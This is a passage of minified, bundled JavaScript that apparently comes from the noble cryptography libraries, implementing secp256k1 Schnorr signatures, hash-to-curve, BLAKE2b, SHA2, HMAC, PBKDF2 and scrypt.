                        return !(!f || !f.hasEvenY() || f.toAffine().x !== t);
                    } catch (e) {
                        return !1;
                    }
                    var s, a, c, l;
                }
                t.schnorr = {
                    getPublicKey: function(e) {
                        return S(e).bytes;
                    },
                    sign: function(e, t, r = (0, o.randomBytes)(32)) {
                        const n = (0, u.ensureBytes)("message", e), { bytes: i, scalar: s } = S(t), a = (0, u.ensureBytes)("auxRand", r, 32), c = w(s ^ (0, u.bytesToNumberBE)(A("BIP0340/aux", a))), l = A("BIP0340/nonce", c, i, n), d = R((0, u.bytesToNumberBE)(l));
                        if (d === v) throw new Error("sign failed: k is zero");
                        const { bytes: h, scalar: f } = S(d), p = O(h, i, n), m = new Uint8Array(64);
                        if (m.set(h, 0), m.set(w(R(f + p * s)), 32), !x(m, n, i)) throw new Error("sign: Invalid signature produced");
                        return m;
                    },
                    verify: x,
                    utils: {
                        randomPrivateKey: t.secp256k1.utils.randomPrivateKey,
                        lift_x: P,
                        pointToBytes: _,
                        numberToBytesBE: u.numberToBytesBE,
                        bytesToNumberBE: u.bytesToNumberBE,
                        taggedHash: A,
                        mod: s.mod
                    }
                };
                const M = c.isogenyMap(y, [
                    [
                        "0x8e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38daaaaa8c7",
                        "0x7d3d4c80bc321d5b9f315cea7fd44c5d595d2fc0bf63b92dfff1044f17c6581",
                        "0x534c328d23f234e6e2a413deca25caece4506144037c40314ecbd0b53d9dd262",
                        "0x8e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38daaaaa88c"
                    ],
                    [
                        "0xd35771193d94918a9ca34ccbb7b640dd86cd409542f8487d9fe6b745781eb49b",
                        "0xedadc6f64383dc1df7c4b2d51b54225406d36b641f5e41bbc52a56612a8c6d14",
                        "0x0000000000000000000000000000000000000000000000000000000000000001"
                    ],
                    [
                        "0x4bda12f684bda12f684bda12f684bda12f684bda12f684bda12f684b8e38e23c",
                        "0xc75e0c32d5cb7c0fa9d0a54b12a0a6d5647ab046d686da6fdffc90fc201d71a3",
                        "0x29a6194691f91a73715209ef6512e576722830a201be2018a765e85a9ecee931",
                        "0x2f684bda12f684bda12f684bda12f684bda12f684bda12f684bda12f38e38d84"
                    ],
                    [
                        "0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffff93b",
                        "0x7a06534bb8bdb49fd5e9e6632722c2989467c1bfc8e8d978dfb425d2685c2573",
                        "0x6484aa716545ca2cf3a70c3fa8fe337e0a3d21162f0d6299a7bf8192bfd2a76f",
                        "0x0000000000000000000000000000000000000000000000000000000000000001"
                    ]
                ].map((e)=>e.map((e)=>BigInt(e)))), B = (0, a.mapToCurveSimpleSWU)(y, {
                    A: BigInt("0x3f8731abdd661adca08a5558f0f5d272e953d363cb6f0e5d405447c01a444533"),
                    B: BigInt("1771"),
                    Z: y.create(BigInt("-11"))
                });
                n = c.createHasher(t.secp256k1.ProjectivePoint, (e)=>{
                    const { x: t, y: r } = B(y.create(e[0]));
                    return M(t, r);
                }, {
                    DST: "secp256k1_XMD:SHA-256_SSWU_RO_",
                    encodeDST: "secp256k1_XMD:SHA-256_SSWU_NU_",
                    p: y.ORDER,
                    m: 1,
                    k: 128,
                    expand: "xmd",
                    hash: i.sha256
                }), t.hashToCurve = n.hashToCurve, t.encodeToCurve = n.encodeToCurve;
            },
            3525: (e, t)=>{
                "use strict";
                function r(e) {
                    if (!Number.isSafeInteger(e) || e < 0) throw new Error(`Wrong positive integer: ${e}`);
                }
                function n(e) {
                    if ("boolean" != typeof e) throw new Error(`Expected boolean, not ${e}`);
                }
                function i(e, ...t) {
                    if (!(e instanceof Uint8Array)) throw new TypeError("Expected Uint8Array");
                    if (t.length > 0 && !t.includes(e.length)) throw new TypeError(`Expected Uint8Array of length ${t}, not of length=${e.length}`);
                }
                function o(e) {
                    if ("function" != typeof e || "function" != typeof e.create) throw new Error("Hash should be wrapped by utils.wrapConstructor");
                    r(e.outputLen), r(e.blockLen);
                }
                function s(e, t = !0) {
                    if (e.destroyed) throw new Error("Hash instance has been destroyed");
                    if (t && e.finished) throw new Error("Hash#digest() has already been called");
                }
                function a(e, t) {
                    i(e);
                    const r = t.outputLen;
                    if (e.length < r) throw new Error(`digestInto() expects output buffer of length at least ${r}`);
                }
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.output = t.exists = t.hash = t.bytes = t.bool = t.number = void 0, t.number = r, t.bool = n, t.bytes = i, t.hash = o, t.exists = s, t.output = a;
                const u = {
                    number: r,
                    bool: n,
                    bytes: i,
                    hash: o,
                    exists: s,
                    output: a
                };
                t.default = u;
            },
            2686: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.BLAKE2 = t.SIGMA = void 0;
                const n = r(3525), i = r(64);
                t.SIGMA = new Uint8Array([
                    0,
                    1,
                    2,
                    3,
                    4,
                    5,
                    6,
                    7,
                    8,
                    9,
                    10,
                    11,
                    12,
                    13,
                    14,
                    15,
                    14,
                    10,
                    4,
                    8,
                    9,
                    15,
                    13,
                    6,
                    1,
                    12,
                    0,
                    2,
                    11,
                    7,
                    5,
                    3,
                    11,
                    8,
                    12,
                    0,
                    5,
                    2,
                    15,
                    13,
                    10,
                    14,
                    3,
                    6,
                    7,
                    1,
                    9,
                    4,
                    7,
                    9,
                    3,
                    1,
                    13,
                    12,
                    11,
                    14,
                    2,
                    6,
                    5,
                    10,
                    4,
                    0,
                    15,
                    8,
                    9,
                    0,
                    5,
                    7,
                    2,
                    4,
                    10,
                    15,
                    14,
                    1,
                    11,
                    12,
                    6,
                    8,
                    3,
                    13,
                    2,
                    12,
                    6,
                    10,
                    0,
                    11,
                    8,
                    3,
                    4,
                    13,
                    7,
                    5,
                    15,
                    14,
                    1,
                    9,
                    12,
                    5,
                    1,
                    15,
                    14,
                    13,
                    4,
                    10,
                    0,
                    7,
                    6,
                    3,
                    9,
                    2,
                    8,
                    11,
                    13,
                    11,
                    7,
                    14,
                    12,
                    1,
                    3,
                    9,
                    5,
                    0,
                    15,
                    4,
                    8,
                    6,
                    2,
                    10,
                    6,
                    15,
                    14,
                    9,
                    11,
                    3,
                    0,
                    8,
                    12,
                    2,
                    13,
                    7,
                    1,
                    4,
                    10,
                    5,
                    10,
                    2,
                    8,
                    4,
                    7,
                    6,
                    1,
                    5,
                    15,
                    11,
                    9,
                    14,
                    3,
                    12,
                    13,
                    0,
                    0,
                    1,
                    2,
                    3,
                    4,
                    5,
                    6,
                    7,
                    8,
                    9,
                    10,
                    11,
                    12,
                    13,
                    14,
                    15,
                    14,
                    10,
                    4,
                    8,
                    9,
                    15,
                    13,
                    6,
                    1,
                    12,
                    0,
                    2,
                    11,
                    7,
                    5,
                    3
                ]);
                class o extends i.Hash {
                    constructor(e, t, r = {}, o, s, a){
                        if (super(), this.blockLen = e, this.outputLen = t, this.length = 0, this.pos = 0, this.finished = !1, this.destroyed = !1, n.default.number(e), n.default.number(t), n.default.number(o), t < 0 || t > o) throw new Error("outputLen bigger than keyLen");
                        if (void 0 !== r.key && (r.key.length < 1 || r.key.length > o)) throw new Error(`key must be up 1..${o} byte long or undefined`);
                        if (void 0 !== r.salt && r.salt.length !== s) throw new Error(`salt must be ${s} byte long or undefined`);
                        if (void 0 !== r.personalization && r.personalization.length !== a) throw new Error(`personalization must be ${a} byte long or undefined`);
                        this.buffer32 = (0, i.u32)(this.buffer = new Uint8Array(e));
                    }
                    update(e) {
                        n.default.exists(this);
                        const { blockLen: t, buffer: r, buffer32: o } = this, s = (e = (0, i.toBytes)(e)).length;
                        for(let n = 0; n < s;){
                            this.pos === t && (this.compress(o, 0, !1), this.pos = 0);
                            const i = Math.min(t - this.pos, s - n), a = e.byteOffset + n;
                            if (i !== t || a % 4 || !(n + i < s)) r.set(e.subarray(n, n + i), this.pos), this.pos += i, this.length += i, n += i;
                            else {
                                const r = new Uint32Array(e.buffer, a, Math.floor((s - n) / 4));
                                for(let e = 0; n + t < s; e += o.length, n += t)this.length += t, this.compress(r, e, !1);
                            }
                        }
                        return this;
                    }
                    digestInto(e) {
                        n.default.exists(this), n.default.output(e, this);
                        const { pos: t, buffer32: r } = this;
                        this.finished = !0, this.buffer.subarray(t).fill(0), this.compress(r, 0, !0);
                        const o = (0, i.u32)(e);
                        this.get().forEach((e, t)=>o[t] = e);
                    }
                    digest() {
                        const { buffer: e, outputLen: t } = this;
                        this.digestInto(e);
                        const r = e.slice(0, t);
                        return this.destroy(), r;
                    }
                    _cloneInto(e) {
                        const { buffer: t, length: r, finished: n, destroyed: i, outputLen: o, pos: s } = this;
                        return e || (e = new this.constructor({
                            dkLen: o
                        })), e.set(...this.get()), e.length = r, e.finished = n, e.destroyed = i, e.outputLen = o, e.buffer.set(t), e.pos = s, e;
                    }
                }
                t.BLAKE2 = o;
            },
            9350: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.SHA2 = void 0;
                const n = r(3525), i = r(64);
                class o extends i.Hash {
                    constructor(e, t, r, n){
                        super(), this.blockLen = e, this.outputLen = t, this.padOffset = r, this.isLE = n, this.finished = !1, this.length = 0, this.pos = 0, this.destroyed = !1, this.buffer = new Uint8Array(e), this.view = (0, i.createView)(this.buffer);
                    }
                    update(e) {
                        n.default.exists(this);
                        const { view: t, buffer: r, blockLen: o } = this, s = (e = (0, i.toBytes)(e)).length;
                        for(let n = 0; n < s;){
                            const a = Math.min(o - this.pos, s - n);
                            if (a !== o) r.set(e.subarray(n, n + a), this.pos), this.pos += a, n += a, this.pos === o && (this.process(t, 0), this.pos = 0);
                            else {
                                const t = (0, i.createView)(e);
                                for(; o <= s - n; n += o)this.process(t, n);
                            }
                        }
                        return this.length += e.length, this.roundClean(), this;
                    }
                    digestInto(e) {
                        n.default.exists(this), n.default.output(e, this), this.finished = !0;
                        const { buffer: t, view: r, blockLen: o, isLE: s } = this;
                        let { pos: a } = this;
                        t[a++] = 128, this.buffer.subarray(a).fill(0), this.padOffset > o - a && (this.process(r, 0), a = 0);
                        for(let e = a; e < o; e++)t[e] = 0;
                        !function(e, t, r, n) {
                            if ("function" == typeof e.setBigUint64) return e.setBigUint64(t, r, n);
                            const i = BigInt(32), o = BigInt(4294967295), s = Number(r >> i & o), a = Number(r & o), u = n ? 4 : 0, c = n ? 0 : 4;
                            e.setUint32(t + u, s, n), e.setUint32(t + c, a, n);
                        }(r, o - 8, BigInt(8 * this.length), s), this.process(r, 0);
                        const u = (0, i.createView)(e), c = this.outputLen;
                        if (c % 4) throw new Error("_sha2: outputLen should be aligned to 32bit");
                        const l = c / 4, d = this.get();
                        if (l > d.length) throw new Error("_sha2: outputLen bigger than state");
                        for(let e = 0; e < l; e++)u.setUint32(4 * e, d[e], s);
                    }
                    digest() {
                        const { buffer: e, outputLen: t } = this;
                        this.digestInto(e);
                        const r = e.slice(0, t);
                        return this.destroy(), r;
                    }
                    _cloneInto(e) {
                        e || (e = new this.constructor), e.set(...this.get());
                        const { blockLen: t, buffer: r, length: n, finished: i, destroyed: o, pos: s } = this;
                        return e.length = n, e.pos = s, e.finished = i, e.destroyed = o, n % t && e.buffer.set(r), e;
                    }
                }
                t.SHA2 = o;
            },
            1655: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.add = t.toBig = t.split = t.fromBig = void 0;
                const r = BigInt(2 ** 32 - 1), n = BigInt(32);
                function i(e, t = !1) {
                    return t ? {
                        h: Number(e & r),
                        l: Number(e >> n & r)
                    } : {
                        h: 0 | Number(e >> n & r),
                        l: 0 | Number(e & r)
                    };
                }
                function o(e, t = !1) {
                    let r = new Uint32Array(e.length), n = new Uint32Array(e.length);
                    for(let o = 0; o < e.length; o++){
                        const { h: s, l: a } = i(e[o], t);
                        [r[o], n[o]] = [
                            s,
                            a
                        ];
                    }
                    return [
                        r,
                        n
                    ];
                }
                function s(e, t, r, n) {
                    const i = (t >>> 0) + (n >>> 0);
                    return {
                        h: e + r + (i / 2 ** 32 | 0) | 0,
                        l: 0 | i
                    };
                }
                t.fromBig = i, t.split = o, t.toBig = (e, t)=>BigInt(e >>> 0) << n | BigInt(t >>> 0), t.add = s;
                const a = {
                    fromBig: i,
                    split: o,
                    toBig: t.toBig,
                    shrSH: (e, t, r)=>e >>> r,
                    shrSL: (e, t, r)=>e << 32 - r | t >>> r,
                    rotrSH: (e, t, r)=>e >>> r | t << 32 - r,
                    rotrSL: (e, t, r)=>e << 32 - r | t >>> r,
                    rotrBH: (e, t, r)=>e << 64 - r | t >>> r - 32,
                    rotrBL: (e, t, r)=>e >>> r - 32 | t << 64 - r,
                    rotr32H: (e, t)=>t,
                    rotr32L: (e, t)=>e,
                    rotlSH: (e, t, r)=>e << r | t >>> 32 - r,
                    rotlSL: (e, t, r)=>t << r | e >>> 32 - r,
                    rotlBH: (e, t, r)=>t << r - 32 | e >>> 64 - r,
                    rotlBL: (e, t, r)=>e << r - 32 | t >>> 64 - r,
                    add: s,
                    add3L: (e, t, r)=>(e >>> 0) + (t >>> 0) + (r >>> 0),
                    add3H: (e, t, r, n)=>t + r + n + (e / 2 ** 32 | 0) | 0,
                    add4L: (e, t, r, n)=>(e >>> 0) + (t >>> 0) + (r >>> 0) + (n >>> 0),
                    add4H: (e, t, r, n, i)=>t + r + n + i + (e / 2 ** 32 | 0) | 0,
                    add5H: (e, t, r, n, i, o)=>t + r + n + i + o + (e / 2 ** 32 | 0) | 0,
                    add5L: (e, t, r, n, i)=>(e >>> 0) + (t >>> 0) + (r >>> 0) + (n >>> 0) + (i >>> 0)
                };
                t.default = a;
            },
            3806: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.blake2b = void 0;
                const n = r(2686), i = r(1655), o = r(64), s = new Uint32Array([
                    4089235720,
                    1779033703,
                    2227873595,
                    3144134277,
                    4271175723,
                    1013904242,
                    1595750129,
                    2773480762,
                    2917565137,
                    1359893119,
                    725511199,
                    2600822924,
                    4215389547,
                    528734635,
                    327033209,
                    1541459225
                ]), a = new Uint32Array(32);
                function u(e, t, r, n, o, s) {
                    const u = o[s], c = o[s + 1];
                    let l = a[2 * e], d = a[2 * e + 1], h = a[2 * t], f = a[2 * t + 1], p = a[2 * r], m = a[2 * r + 1], g = a[2 * n], y = a[2 * n + 1], v = i.default.add3L(l, h, u);
                    d = i.default.add3H(v, d, f, c), l = 0 | v, ({ Dh: y, Dl: g } = {
                        Dh: y ^ d,
                        Dl: g ^ l
                    }), ({ Dh: y, Dl: g } = {
                        Dh: i.default.rotr32H(y, g),
                        Dl: i.default.rotr32L(y, g)
                    }), ({ h: m, l: p } = i.default.add(m, p, y, g)), ({ Bh: f, Bl: h } = {
                        Bh: f ^ m,
                        Bl: h ^ p
                    }), ({ Bh: f, Bl: h } = {
                        Bh: i.default.rotrSH(f, h, 24),
                        Bl: i.default.rotrSL(f, h, 24)
                    }), a[2 * e] = l, a[2 * e + 1] = d, a[2 * t] = h, a[2 * t + 1] = f, a[2 * r] = p, a[2 * r + 1] = m, a[2 * n] = g, a[2 * n + 1] = y;
                }
                function c(e, t, r, n, o, s) {
                    const u = o[s], c = o[s + 1];
                    let l = a[2 * e], d = a[2 * e + 1], h = a[2 * t], f = a[2 * t + 1], p = a[2 * r], m = a[2 * r + 1], g = a[2 * n], y = a[2 * n + 1], v = i.default.add3L(l, h, u);
                    d = i.default.add3H(v, d, f, c), l = 0 | v, ({ Dh: y, Dl: g } = {
                        Dh: y ^ d,
                        Dl: g ^ l
                    }), ({ Dh: y, Dl: g } = {
                        Dh: i.default.rotrSH(y, g, 16),
                        Dl: i.default.rotrSL(y, g, 16)
                    }), ({ h: m, l: p } = i.default.add(m, p, y, g)), ({ Bh: f, Bl: h } = {
                        Bh: f ^ m,
                        Bl: h ^ p
                    }), ({ Bh: f, Bl: h } = {
                        Bh: i.default.rotrBH(f, h, 63),
                        Bl: i.default.rotrBL(f, h, 63)
                    }), a[2 * e] = l, a[2 * e + 1] = d, a[2 * t] = h, a[2 * t + 1] = f, a[2 * r] = p, a[2 * r + 1] = m, a[2 * n] = g, a[2 * n + 1] = y;
                }
                class l extends n.BLAKE2 {
                    constructor(e = {}){
                        super(128, void 0 === e.dkLen ? 64 : e.dkLen, e, 64, 16, 16), this.v0l = 0 | s[0], this.v0h = 0 | s[1], this.v1l = 0 | s[2], this.v1h = 0 | s[3], this.v2l = 0 | s[4], this.v2h = 0 | s[5], this.v3l = 0 | s[6], this.v3h = 0 | s[7], this.v4l = 0 | s[8], this.v4h = 0 | s[9], this.v5l = 0 | s[10], this.v5h = 0 | s[11], this.v6l = 0 | s[12], this.v6h = 0 | s[13], this.v7l = 0 | s[14], this.v7h = 0 | s[15];
                        const t = e.key ? e.key.length : 0;
                        if (this.v0l ^= this.outputLen | t << 8 | 16842752, e.salt) {
                            const t = (0, o.u32)((0, o.toBytes)(e.salt));
                            this.v4l ^= t[0], this.v4h ^= t[1], this.v5l ^= t[2], this.v5h ^= t[3];
                        }
                        if (e.personalization) {
                            const t = (0, o.u32)((0, o.toBytes)(e.personalization));
                            this.v6l ^= t[0], this.v6h ^= t[1], this.v7l ^= t[2], this.v7h ^= t[3];
                        }
                        if (e.key) {
                            const t = new Uint8Array(this.blockLen);
                            t.set((0, o.toBytes)(e.key)), this.update(t);
                        }
                    }
                    get() {
                        let { v0l: e, v0h: t, v1l: r, v1h: n, v2l: i, v2h: o, v3l: s, v3h: a, v4l: u, v4h: c, v5l: l, v5h: d, v6l: h, v6h: f, v7l: p, v7h: m } = this;
                        return [
                            e,
                            t,
                            r,
                            n,
                            i,
                            o,
                            s,
                            a,
                            u,
                            c,
                            l,
                            d,
                            h,
                            f,
                            p,
                            m
                        ];
                    }
                    set(e, t, r, n, i, o, s, a, u, c, l, d, h, f, p, m) {
                        this.v0l = 0 | e, this.v0h = 0 | t, this.v1l = 0 | r, this.v1h = 0 | n, this.v2l = 0 | i, this.v2h = 0 | o, this.v3l = 0 | s, this.v3h = 0 | a, this.v4l = 0 | u, this.v4h = 0 | c, this.v5l = 0 | l, this.v5h = 0 | d, this.v6l = 0 | h, this.v6h = 0 | f, this.v7l = 0 | p, this.v7h = 0 | m;
                    }
                    compress(e, t, r) {
                        this.get().forEach((e, t)=>a[t] = e), a.set(s, 16);
                        let { h: o, l: l } = i.default.fromBig(BigInt(this.length));
                        a[24] = s[8] ^ l, a[25] = s[9] ^ o, r && (a[28] = ~a[28], a[29] = ~a[29]);
                        let d = 0;
                        const h = n.SIGMA;
                        for(let r = 0; r < 12; r++)u(0, 4, 8, 12, e, t + 2 * h[d++]), c(0, 4, 8, 12, e, t + 2 * h[d++]), u(1, 5, 9, 13, e, t + 2 * h[d++]), c(1, 5, 9, 13, e, t + 2 * h[d++]), u(2, 6, 10, 14, e, t + 2 * h[d++]), c(2, 6, 10, 14, e, t + 2 * h[d++]), u(3, 7, 11, 15, e, t + 2 * h[d++]), c(3, 7, 11, 15, e, t + 2 * h[d++]), u(0, 5, 10, 15, e, t + 2 * h[d++]), c(0, 5, 10, 15, e, t + 2 * h[d++]), u(1, 6, 11, 12, e, t + 2 * h[d++]), c(1, 6, 11, 12, e, t + 2 * h[d++]), u(2, 7, 8, 13, e, t + 2 * h[d++]), c(2, 7, 8, 13, e, t + 2 * h[d++]), u(3, 4, 9, 14, e, t + 2 * h[d++]), c(3, 4, 9, 14, e, t + 2 * h[d++]);
                        this.v0l ^= a[0] ^ a[16], this.v0h ^= a[1] ^ a[17], this.v1l ^= a[2] ^ a[18], this.v1h ^= a[3] ^ a[19], this.v2l ^= a[4] ^ a[20], this.v2h ^= a[5] ^ a[21], this.v3l ^= a[6] ^ a[22], this.v3h ^= a[7] ^ a[23], this.v4l ^= a[8] ^ a[24], this.v4h ^= a[9] ^ a[25], this.v5l ^= a[10] ^ a[26], this.v5h ^= a[11] ^ a[27], this.v6l ^= a[12] ^ a[28], this.v6h ^= a[13] ^ a[29], this.v7l ^= a[14] ^ a[30], this.v7h ^= a[15] ^ a[31], a.fill(0);
                    }
                    destroy() {
                        this.destroyed = !0, this.buffer32.fill(0), this.set(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0);
                    }
                }
                t.blake2b = (0, o.wrapConstructorWithOpts)((e)=>new l(e));
            },
            825: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.crypto = void 0, t.crypto = "object" == typeof globalThis && "crypto" in globalThis ? globalThis.crypto : void 0;
            },
            1377: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.hmac = void 0;
                const n = r(3525), i = r(64);
                class o extends i.Hash {
                    constructor(e, t){
                        super(), this.finished = !1, this.destroyed = !1, n.default.hash(e);
                        const r = (0, i.toBytes)(t);
                        if (this.iHash = e.create(), "function" != typeof this.iHash.update) throw new TypeError("Expected instance of class which extends utils.Hash");
                        this.blockLen = this.iHash.blockLen, this.outputLen = this.iHash.outputLen;
                        const o = this.blockLen, s = new Uint8Array(o);
                        s.set(r.length > o ? e.create().update(r).digest() : r);
                        for(let e = 0; e < s.length; e++)s[e] ^= 54;
                        this.iHash.update(s), this.oHash = e.create();
                        for(let e = 0; e < s.length; e++)s[e] ^= 106;
                        this.oHash.update(s), s.fill(0);
                    }
                    update(e) {
                        return n.default.exists(this), this.iHash.update(e), this;
                    }
                    digestInto(e) {
                        n.default.exists(this), n.default.bytes(e, this.outputLen), this.finished = !0, this.iHash.digestInto(e), this.oHash.update(e), this.oHash.digestInto(e), this.destroy();
                    }
                    digest() {
                        const e = new Uint8Array(this.oHash.outputLen);
                        return this.digestInto(e), e;
                    }
                    _cloneInto(e) {
                        e || (e = Object.create(Object.getPrototypeOf(this), {}));
                        const { oHash: t, iHash: r, finished: n, destroyed: i, blockLen: o, outputLen: s } = this;
                        return e.finished = n, e.destroyed = i, e.blockLen = o, e.outputLen = s, e.oHash = t._cloneInto(e.oHash), e.iHash = r._cloneInto(e.iHash), e;
                    }
                    destroy() {
                        this.destroyed = !0, this.oHash.destroy(), this.iHash.destroy();
                    }
                }
                t.hmac = (e, t, r)=>new o(e, t).update(r).digest(), t.hmac.create = (e, t)=>new o(e, t);
            },
            9179: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.pbkdf2Async = t.pbkdf2 = void 0;
                const n = r(3525), i = r(1377), o = r(64);
                function s(e, t, r, s) {
                    n.default.hash(e);
                    const a = (0, o.checkOpts)({
                        dkLen: 32,
                        asyncTick: 10
                    }, s), { c: u, dkLen: c, asyncTick: l } = a;
                    if (n.default.number(u), n.default.number(c), n.default.number(l), u < 1) throw new Error("PBKDF2: iterations (c) should be >= 1");
                    const d = (0, o.toBytes)(t), h = (0, o.toBytes)(r), f = new Uint8Array(c), p = i.hmac.create(e, d), m = p._cloneInto().update(h);
                    return {
                        c: u,
                        dkLen: c,
                        asyncTick: l,
                        DK: f,
                        PRF: p,
                        PRFSalt: m
                    };
                }
                function a(e, t, r, n, i) {
                    return e.destroy(), t.destroy(), n && n.destroy(), i.fill(0), r;
                }
                t.pbkdf2 = function(e, t, r, n) {
                    const { c: i, dkLen: u, DK: c, PRF: l, PRFSalt: d } = s(e, t, r, n);
                    let h;
                    const f = new Uint8Array(4), p = (0, o.createView)(f), m = new Uint8Array(l.outputLen);
                    for(let e = 1, t = 0; t < u; e++, t += l.outputLen){
                        const r = c.subarray(t, t + l.outputLen);
                        p.setInt32(0, e, !1), (h = d._cloneInto(h)).update(f).digestInto(m), r.set(m.subarray(0, r.length));
                        for(let e = 1; e < i; e++){
                            l._cloneInto(h).update(m).digestInto(m);
                            for(let e = 0; e < r.length; e++)r[e] ^= m[e];
                        }
                    }
                    return a(l, d, c, h, m);
                }, t.pbkdf2Async = async function(e, t, r, n) {
                    const { c: i, dkLen: u, asyncTick: c, DK: l, PRF: d, PRFSalt: h } = s(e, t, r, n);
                    let f;
                    const p = new Uint8Array(4), m = (0, o.createView)(p), g = new Uint8Array(d.outputLen);
                    for(let e = 1, t = 0; t < u; e++, t += d.outputLen){
                        const r = l.subarray(t, t + d.outputLen);
                        m.setInt32(0, e, !1), (f = h._cloneInto(f)).update(p).digestInto(g), r.set(g.subarray(0, r.length)), await (0, o.asyncLoop)(i - 1, c, (e)=>{
                            d._cloneInto(f).update(g).digestInto(g);
                            for(let e = 0; e < r.length; e++)r[e] ^= g[e];
                        });
                    }
                    return a(d, h, l, f, g);
                };
            },
            2739: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.scryptAsync = t.scrypt = void 0;
                const n = r(3525), i = r(6053), o = r(9179), s = r(64), a = (e, t)=>e << t | e >>> 32 - t;
                function u(e, t, r, n, i, o) {
                    let s = e[t++] ^ r[n++], u = e[t++] ^ r[n++], c = e[t++] ^ r[n++], l = e[t++] ^ r[n++], d = e[t++] ^ r[n++], h = e[t++] ^ r[n++], f = e[t++] ^ r[n++], p = e[t++] ^ r[n++], m = e[t++] ^ r[n++], g = e[t++] ^ r[n++], y = e[t++] ^ r[n++], v = e[t++] ^ r[n++], b = e[t++] ^ r[n++], E = e[t++] ^ r[n++], A = e[t++] ^ r[n++], _ = e[t++] ^ r[n++], w = s, T = u, R = c, I = l, S = d, P = h, O = f, x = p, M = m, B = g, N = y, C = v, k = b, L = E, F = A, D = _;
                    for(let e = 0; e < 8; e += 2)S ^= a(w + k | 0, 7), M ^= a(S + w | 0, 9), k ^= a(M + S | 0, 13), w ^= a(k + M | 0, 18), B ^= a(P + T | 0, 7), L ^= a(B + P | 0, 9), T ^= a(L + B | 0, 13), P ^= a(T + L | 0, 18), F ^= a(N + O | 0, 7), R ^= a(F + N | 0, 9), O ^= a(R + F | 0, 13), N ^= a(O + R | 0, 18), I ^= a(D + C | 0, 7), x ^= a(I + D | 0, 9), C ^= a(x + I | 0, 13), D ^= a(C + x | 0, 18), T ^= a(w + I | 0, 7), R ^= a(T + w | 0, 9), I ^= a(R + T | 0, 13), w ^= a(I + R | 0, 18), O ^= a(P + S | 0, 7), x ^= a(O + P | 0, 9), S ^= a(x + O | 0, 13), P ^= a(S + x | 0, 18), C ^= a(N + B | 0, 7), M ^= a(C + N | 0, 9), B ^= a(M + C | 0, 13), N ^= a(B + M | 0, 18), k ^= a(D + F | 0, 7), L ^= a(k + D | 0, 9), F ^= a(L + k | 0, 13), D ^= a(F + L | 0, 18);
                    i[o++] = s + w | 0, i[o++] = u + T | 0, i[o++] = c + R | 0, i[o++] = l + I | 0, i[o++] = d + S | 0, i[o++] = h + P | 0, i[o++] = f + O | 0, i[o++] = p + x | 0, i[o++] = m + M | 0, i[o++] = g + B | 0, i[o++] = y + N | 0, i[o++] = v + C | 0, i[o++] = b + k | 0, i[o++] = E + L | 0, i[o++] = A + F | 0, i[o++] = _ + D | 0;
                }
                function c(e, t, r, n, i) {
                    let o = n + 0, s = n + 16 * i;
                    for(let n = 0; n < 16; n++)r[s + n] = e[t + 16 * (2 * i - 1) + n];
                    for(let n = 0; n < i; n++, o += 16, t += 16)u(r, s, e, t, r, o), n > 0 && (s += 16), u(r, o, e, t += 16, r, s);
                }
                function l(e, t, r) {
                    const a = (0, s.checkOpts)({
                        dkLen: 32,
                        asyncTick: 10,
                        maxmem: 1073742848
                    }, r), { N: u, r: c, p: l, dkLen: d, asyncTick: h, maxmem: f, onProgress: p } = a;
                    if (n.default.number(u), n.default.number(c), n.default.number(l), n.default.number(d), n.default.number(h), n.default.number(f), void 0 !== p && "function" != typeof p) throw new Error("progressCb should be function");
                    const m = 128 * c, g = m / 4;
                    if (u <= 1 || 0 != (u & u - 1) || u >= 2 ** (m / 8) || u > 2 ** 32) throw new Error("Scrypt: N must be larger than 1, a power of 2, less than 2^(128 * r / 8) and less than 2^32");
                    if (l < 0 || l > 137438953440 / m) throw new Error("Scrypt: p must be a positive integer less than or equal to ((2^32 - 1) * 32) / (128 * r)");
                    if (d < 0 || d > 137438953440) throw new Error("Scrypt: dkLen should be positive integer less than or equal to (2^32 - 1) * 32");
                    const y = m * (u + l);
                    if (y > f) throw new Error(`Scrypt: parameters too large, ${y} (128 * r * (N + p)) > ${f} (maxmem)`);
                    const v = (0, o.pbkdf2)(i.sha256, e, t, {
                        c: 1,
                        dkLen: m * l
                    }), b = (0, s.u32)(v), E = (0, s.u32)(new Uint8Array(m * u)), A = (0, s.u32)(new Uint8Array(m));
                    let _ = ()=>{};
                    if (p) {
                        const e = 2 * u * l, t = Math.max(Math.floor(e / 1e4), 1);
                        let r = 0;
                        _ = ()=>{
                            r++, !p || r % t && r !== e || p(r / e);
                        };
                    }
                    return {
                        N: u,
                        r: c,
                        p: l,
                        dkLen: d,
                        blockSize32: g,
                        V: E,
                        B32: b,
                        B: v,
                        tmp: A,
                        blockMixCb: _,
                        asyncTick: h
                    };
                }
                function d(e, t, r, n, s) {
                    const a = (0, o.pbkdf2)(i.sha256, e, r, {
                        c: 1,
                        dkLen: t
                    });
                    return r.fill(0), n.fill(0), s.fill(0), a;
                }
                t.scrypt = function(e, t, r) {
                    const { N: n, r: i, p: o, dkLen: s, blockSize32: a, V: u, B32: h, B: f, tmp: p, blockMixCb: m } = l(e, t, r);
                    for(let e = 0; e < o; e++){
                        const t = a * e;
                        for(let e = 0; e < a; e++)u[e] = h[t + e];
                        for(let e = 0, t = 0; e < n - 1; e++)c(u, t, u, t += a, i), m();
                        c(u, (n - 1) * a, h, t, i), m();
                        for(let e = 0; e < n; e++){
                            const e = h[t + a - 16] % n;
                            for(let r = 0; r < a; r++)p[r] = h[t + r] ^ u[e * a + r];
                            c(p, 0, h, t, i), m();
                        }
                    }
                    return d(e, s, f, u, p);
